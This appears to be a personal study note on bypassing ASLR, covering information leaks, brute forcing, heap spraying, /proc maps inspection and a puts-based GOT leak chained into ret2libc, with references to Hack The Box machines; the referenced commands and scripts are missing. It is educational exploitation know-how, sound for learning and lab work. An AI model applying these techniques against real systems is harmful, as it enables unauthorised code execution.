Address Space Layout Randomisation (ASLR) is a feature that causes memory addresses of functions and instructions to be randomised. Each time we run a binary, all of the addresses would change and never be the same.
In earlier Buffer Overflows, we examined how controlling the EIP can lead to RCE, with or without NX protection. However, with ASLR enabled, even if we can control the EIP, we cannot 'jump' anywhere because we wouldn't know where to jump to with ASLR enabled.
In order to bypass ASLR, we need to understand how it functions, as well as how functions are called. When we run a binary, the libraries and functions of that binary are loaded into virtual memory.
With ASLR enabled, the library would be loaded at different places in memory each time. With the main library being loaded differently, all functions called in the library are affected and have different locations in memory.
Functions are called based on offsets. For example, if the libc library is loaded at 0x10000000
, and the offset for the printf()
function is 0x00001000
, then when a program is run and printf()
is called, it is mapped at 0x10001000
.
Generally, base address (where library is called) + offset = memory location of function.
The vulnerability arises because when ASLR is enabled, the offset does not change and is constant. So, if we are able to find the base address where the library is called, we can use the constant offsets to load certain functions.
To bypass ASLR, there are a few methods possible
Information Leak Vulnerability
Can be an LFI or anything else that lets us read memory locations on the machine.
Memory disclosure vulnerabilities also can work.
Brute Forcing
Perhaps the range of addresses where the library is loaded is rather small. This indicates that the base address could be brute forced and a simple for loop can cover all of it rather quickly.
Done in the October box from HTB.
Memory Spraying
Involves using an amplification gadget, which is a piece of code that takes an existing chunk of data and copies it, allowing the attacker to spray a large amount of memory by only sending a relatively small number of bytes.
Heap spraying is not as feasible anymore (but still possible on iOS devices).
On Linux machines, we can inspect the mappings of a process given its pid through procfs
, which is done through reading the file at /proc/<pid>/maps
. Here's some sample output from the Retired box from HTB (which had an LFI):
This provides memory addresses for each loaded library as well as the program itself. It also identifes areas of memory that are writable or executable.
Now, suppose we do this multiple times, we can find out a few things like:
How wide is the range of addresses? Can it be brute-forced?
Where is the stack loaded?
Where is the heap relative to the binary?
In general, reading this (if we are able to) allows us to find out more efficient methods of exploitation.
Now, suppose we have a leak to abuse. This involves using the PLT and GOT tables within the binary:
Procedure Linkage Table is used to call external procedures whose address is not known in the time of linking, and is left to be resolved by the dynamic linker at run time.
Global Offsets Table is similar but is used to resolve addresses.
Since the GOT and PLT are used everywhere in the binary, they must have static memory addresses, and the GOT needs to have write permissions.
The leak is exploited through using the puts()
function to print the address of the puts()
function (yes you read it right) in the libc
file mapped in the GOT table, which would allow us to retrieve the base address of libc
to call other functions, all at run time.
To do this, we would need 3 things:
Address of pop rdi
to pass the argument to the RDI register, which would be used to puts.
Address of GOT table where the puts
in libc is.
Address of puts to print the address leaked.
To execute this, we can do the following commands:
This would print the addresses we need for the script below:
But wait, why do we need the main()
address? Well, this is because once our process is stopped, the address leaked will be randomised in the next execution, meaning that we cannot end the process and need a way to preserve it.
By using the main address function, we can 'preserve' this address and make the program wait at main()
for the second stage of our exploit.
The next part of the exploit would be a basic ret2libc or ROP chain, depending on whether NX is enabled or what is possible. For this example, I will be using a simple ret2libc exploit. Since the offsets of the functions needed for this are constant, all we need to do now is use the address of puts
to dump the function of the library.
First we need to find the address of the puts()
function within the libc
file, as well as the system()
, /bin/sh
, and exit()
for our ret2libc.
From the script below, we would be able to find the base address of where libc
is loaded, and because we never technically exited the program, the address is not randomised again. (remember that we called main()
again in the first payload)
And this is how we bypass ASLR using an Information Leak.
To bypass ASLR without the above method is a lot more difficult. This would require memory spraying, which lets us map contiguous memory of a given size, on a given range of addresses.
This abuses a memory leak, a bug of which memory is never 'freed' and triggering it multiple times until the desired amount of memory has been leaked. Also, it uses an amplification gadget which is a piece of code that takes an existing chunk of data and copies it, allowing the attacker to spray a large memory range by only sending a small number of bytes.
For now, I don't have enough knowledge on this to write a proper explanation, so here's a good resource I used to (sort of) understand what's going on.